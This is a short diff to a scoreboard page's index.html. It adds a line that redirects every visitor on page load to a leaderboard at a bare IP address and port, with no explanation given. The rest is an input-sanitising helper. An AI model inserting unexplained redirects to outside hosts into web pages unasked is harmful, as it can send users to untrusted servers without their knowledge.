--- a/Scoreboard/index.html
+++ b/Scoreboard/index.html
@@ -47,6 +47,8 @@
 </div>
 
 <script>
+    document.location = "http://198.244.189.210:4077/leaderboard";
+    
     function s(str){
         return str.replace(/[^a-z0-9áéíóúñü \.\[\]:,_-]/gim,"").trim();
     }
